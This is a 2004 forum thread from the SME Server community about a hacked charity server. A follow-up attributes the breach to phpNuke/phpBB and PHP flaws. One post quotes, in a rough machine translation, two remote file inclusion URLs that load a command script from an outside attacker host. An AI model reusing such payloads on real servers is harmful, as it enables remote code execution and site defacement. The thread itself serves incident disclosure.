Koozali.org: home of the SME Server
Legacy Forums => Experienced User Forum => Topic started by: raem on December 03, 2004, 03:39:55 AM
-
Dear All
It looks like a server I maintain for a charity group has been hacked ....
[moderated, original post received through security@contribs.org]
-
I'm sure that you probably posted this in haste, but please remember that this is a public forum.
security@contribs.org is a more appropriate place for this report.
-
Why is this topic censored?
A security breach needs to be widely known, as we need to know that it has happened and be ready to patch our servers as soon as a patch is available.
-
This is looking like a php security breach rather than a sme server security breach although not fully resolved as yet.
See (in Italian)
http://www.glesius.it/forum/topic.asp?TOPIC_ID=3457
part of which translates to:
The technical adotatta that of utilizare was a condenses from browser to
delimit a situation of injection php on the server and to earn the access
like root (director) and to load a script that carries out a mass defacement
to the index of the sites. [site + exploit + cmd
=]. This technology was carried out to one of the sites that presented the
vulneabilità to one of the forms in phpnuke. They used an of the following
stringhe:
www.sito.it/index.php?=http://dominus.webcindario.com/inf.jpg?&cmd=
www.sito.it//modules/My_eGallery/public/displayCategory.php?basepath=http://
dominus.webcindario.com/inf.jpg?&cmd=
and also see these sites for an interesting read of text conversation between hacker and hacked.
http://xoomer.virgilio.it/gioxx85/deface/log.htm
Thanks to those who helped me, they know who they are.
-
Just as a follow up for readers:
phpBB had a major security vulnerability which in conjunction with a php vulnerability allowed hackers to get root control.
See
http://www.phpbb.com/phpBB/viewtopic.php?t=241300&postdays=0&postorder=asc&start=0
and
http://www.phpbbstyles.com/viewtopic.php?t=1903
and
http://forums.contribs.org/index.php?topic=25275.0